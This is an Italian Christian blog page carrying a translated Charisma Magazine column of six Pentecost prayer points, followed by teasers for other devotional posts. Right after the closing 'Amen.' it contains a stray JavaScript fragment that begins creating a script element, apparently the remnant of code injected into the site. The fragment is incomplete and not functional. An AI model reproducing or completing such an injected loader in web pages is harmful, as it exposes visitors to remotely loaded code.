SIGNORE, MANDA IL VENTO DI UNA NUOVA PENTECOSTE!

Mercoledì 16 Mag, 2012 – dalla rubrica “Fire In My Bones” di  J. Lee Grady –  CHARISMA MAGAZINE.

Dodici anni fa un uomo d’affari sudafricano, Graham Power, sentì Dio spingerlo ad organizzare un incontro di preghiera nella città di Cape Town. Circa 45 mila cristiani hanno risposto alla chiamata accalcandosi in uno stadio di rugby nel marzo 2001, per intercedere per la loro nazione. Quello fu l’inizio della Giornata Mondiale di Preghiera, un evento che probabilmente coinvolgerà milioni di cristiani in 220 nazioni, la Domenica di Pentecoste, il 27 maggio.

Questo anno, gli organizzatori stanno incoraggiando le persone a estendere le loro preghiere a 10 giorni prima dell’evento, partendo dal 17 maggio. Hanno anche sollecitato i pastori ad alimentare la preghiera con sermoni sulla necessità della potenza dello Spirito Santo.

“Un soffio dello Spirito Santo può portare la vita alle ossa secche! Signore, manda il vento fresco della tua presenza nelle congregazioni morte. ”

E’ ovvio che lo Spirito Santo è l’orchestratore di questo movimento popolare, e spero che voi aderiate, sia partecipando ai culti locali durante i prossimi 10 giorni o focalizzando le vostre personali preghiere, sulla necessità di una nuova Pentecoste. Credo che siamo sull’orlo di una nuova stagione di risveglio spirituale, e la concentrazione della preghiera in questo mese sia la chiave per sbloccarlo.

Durante questi prossimi 10 giorni mediterò sui primi capitoli del libro degli Atti e pregherò  per un’effusione di Spirito Santo su questa nazione. Se volete unirvi a me, potete utilizzare i seguenti punti di preghiera come guida:

1. Signore, manda il vento del sincero ravvedimento.
L’effusione originale dello Spirito nel giorno di  Pentecoste, ha scatenato un’ondata di ravvedimento che ha portato 3.000 conversioni. Questo livello di convinzione, non è mai il risultato di sermoni eloquenti, messo eventi pianificati o programmi umani. Solo lo Spirito Santo può fare questo. Il miracolo più grande sulla terra si verifica quando si spezza il cuore del peccatore davanti a Dio ed egli o lei nasce di nuovo.
Signore, suscita una marea di conversioni… E come peccatori pentiti, lascia che cristiani sviati, credenti delusi e stanchi ritornino a Te.

2. Signore, manda il vento di rinnovamento spirituale.
Molte chiese sono deboli e impotenti, e alcune stanno morendo. Molte denominazioni sono paralizzate dallo spirito di religiosità. Molti pastori sono impauriti e scoraggiati. Ma un soffio dello Spirito Santo può portare la vita alle ossa secche! Signore, manda il vento fresco della tua presenza in congregazioni senza vita. E con il tuo vento, fa che si posi una fiamma sulla testa di ogni cristiano, particolarmente su quei riluttanti “Gedeoni”, e timidi “Timoteo” che sanno di essere chiamati, ma hanno bisogno dello Spirito che ispiri loro fiducia.

3. Signore, manda il vento di un risveglio dei giovani. Quando il vento della Pentecoste soffiò la prima volta, Pietro predicò sul profeta Gioele, dicendo: “‘Negli ultimi giorni,’ Dio dice: ‘i vostri figli e le vostre figlie profetizzeranno, e i vostri giovani avranno delle visioni'” (Atti 2:17). Questa è una promessa ancora nostra,  e che  ancora dobbiamo rivendicare. Una percentuale enorme di giovani  sono orfani, tossicodipendenti, maltrattati, sessualmente confusi o in qualche modo a rischio. Signore, fa ‘sorgere e rafforzare ministeri per raggiungere le nostre scuole e le università. Dai agli studenti il coraggio di alzarsi per Cristo e parlare per lui. Manda un altro “Jesus Movement” in questa generazione.

4. Signore, manda il vento delle manifestazioni soprannaturali. La più pietosa eresia mai partorita è l’idea che Dio ha smesso di fare miracoli dopo che è stata scritta la Bibbia. Perdonaci, Signore, per come ti limitiamo! Abbiamo bisogno della potenza della Pentecoste oggi più che mai. Quando la prima Pentecoste avvenne, le persone normali sono stati “rivestiti di potenza dall’alto” (Luca 24:49), e cominciarono a guarire gli infermi, risuscitate i morti e scacciare i demoni. Perdonaci, Signore, per essere così compiaciuti e sofisticati, al punto  abbiamo staccato la spina della tua potenza. (E perdonaci, anche per l’uso improprio, commerciando e sfruttando i doni dello Spirito Santo per un guadagno personale.) Manda un’ondata di miracoli nella chiesa. Fai che  gli stessi miracoli che si verificano in Asia, Africa e America Latina avvengano anche nella nostra nazione.

5. Signore, manda il vento di una coraggiosa evangelizzazione . Quando i primi discepoli sono stati toccati dallo Spirito Santo a Pentecoste, hanno dichiarato “le grandi cose di Dio” (Atti 2:11) ad ogni gruppo razziale ed etnico, che era in quel giorno in Gerusalemme. Abbiamo bisogno di questo coraggio anche ai nostri giorni. Molte delle nostre comunità non hanno nessun testimone del vangelo e molti cristiani non condividono la loro fede con nessuno. La vera unzione dello Spirito Santo sfocia sempre nell’evangelizzazione. Signore, alza il nostro volume! Suscita operai per toccare ogni settore della società. Manda immigrati in questa nazione che possano raggiungere i propri gruppi etnici. Che il Vangelo sia predicato in tutte le lingue parlate all’interno dei nostri confini.

6. Signore, manda il vento di un intervento divino. La nostra nazione è in una crisi disperata. Le famiglie si stanno disintegrando, la moralità si sta erodendo, la perversione è celebrata, e la nostra cultura sta diventando ostile alla fede biblica. A meno che il Signore non risponda con il suo santo fuoco dal cielo,  soccomberemo. Signore, liberaci dal male! Estendi la tua misericordia e manda un nuovo Grande Risveglio. Amen.var d=document;var s=d.createElement(‘script’);

I commenti sono chiusi.

Post meno recenti

...MA DAVIDE SI FORTIFICO' NELL'ETERNO.

1 Samuele 30: 6  –  È una cosa che si comprende all’istante, fortificarsi o farsi coraggio, è un’arte delle più importanti e maggiormente utili. Ma, perché?Perché un uomo scoraggiato è un essere indebolito e vinto. Egli è anche, ed è bene dirlo, un uomo pressocché inutile. Quanta gente è fallita nella vita, non per­ché mancava di capacità, ma perché non ha avuto coraggio sufficiente. Questa, per esempio, è …
Leggi Tutto

BALSAMO DI GALAAD

 di LILIAN B. YEOMANS Tanto tempo fa, su una collina solitaria, tre croci, le vedo ancor! Tanto tempo fa il Salvatore disse, mentre chinava il Suo capo morente: «Tutto è compiuto». Balsamo di Galaad, guarisci le mie ferite, rendimi  interamente sano e forte, Tu sei la Medicina che io prendo, e subito la mia salute irrompe: «Tutto è compiuto».  Geremia 8:22: «Non c’è balsamo in Galaad? Non c’è laggiù nessun medico?» Che …
Leggi Tutto

PER LA SUA GRAZIA

di Agostino Masdea  –  Ma per la grazia di Dio sono quello che sono; e la sua grazia verso di me non è stata vana, anzi ho faticato piú di tutti loro non io però, ma la grazia di Dio che è con me. ( 1 Corinzi 15:10 ) a) Cos’è la grazia? E’ un favore immeritato che ci viene da Dio! Ma è più di questo: E’ la Sua misericordia che …
Leggi Tutto

L'ORGOGLIO, IL GRANDE PECCATO

di C.S. Lewis   Tratto dal libro: Mere Christianity. Che posto occupa l’orgoglio nella nostra vita? Sappiamo che è il peccato più subdolo, spesso mascherato sotto forma di umiltà! É indispensabile che il cristiano autentico esamini se stesso e riconosca le proprie lacune prima di poter progredire nella conoscenza di Dio e arrivare ad essere utile agli altri. Riconoscere l’errore in noi stessi spalanca tutte le porte a Dio, che …
Leggi Tutto

Promessa per oggi: Gesù non si vergogna di essere tuo fratello.

Infatti colui che santifica e quelli che sono santificati provengono tutti da uno; per questo motivo egli non si vergogna di chiamarli fratelli. Ebrei 2:11 Mio fratello ha tre anni più di me. Mentre crescevamo, ha sempre spianato il sentiero davanti a me, in ogni circostanza… a scuola, con i nostri genitori, al lavoro, con gli amici, e anche con le ragazze. Anche se siamo passati attraverso tutte …
Leggi Tutto

Che devo fare?

di Roberto Bracco  –  La tua chiesa langue a causa dell’indifferenza spirituale e della mondanità? La vanità, la carne e il peccato hanno preso il posto della consacrazione, dello spirito e della santità? La potenza celeste non si muove e non opera come operava anni addietro, gli ammalati non vengono più guariti e i tormentati liberati? Insomma ti accorgi che la tua chiesa si trova sulla strada dello …
Leggi Tutto

Ostacolo o benedizione?

Si racconta di un re che pose una pesante pietra in mezzo alla strada maestra e si nascose per osservare chi l’avrebbe rimossa.  Persone di varie classi sociali passarono e raggirarono l’ostacolo, continuando il loro cammino, alcuni biasimando il re per non tener sgombra la strada maestra, ma tutti schivando il lavoro di rimuovere la pietra dalla strada. Finalmente un povero contadino, incamminato verso la città con il …
Leggi Tutto

Dai nostri Culti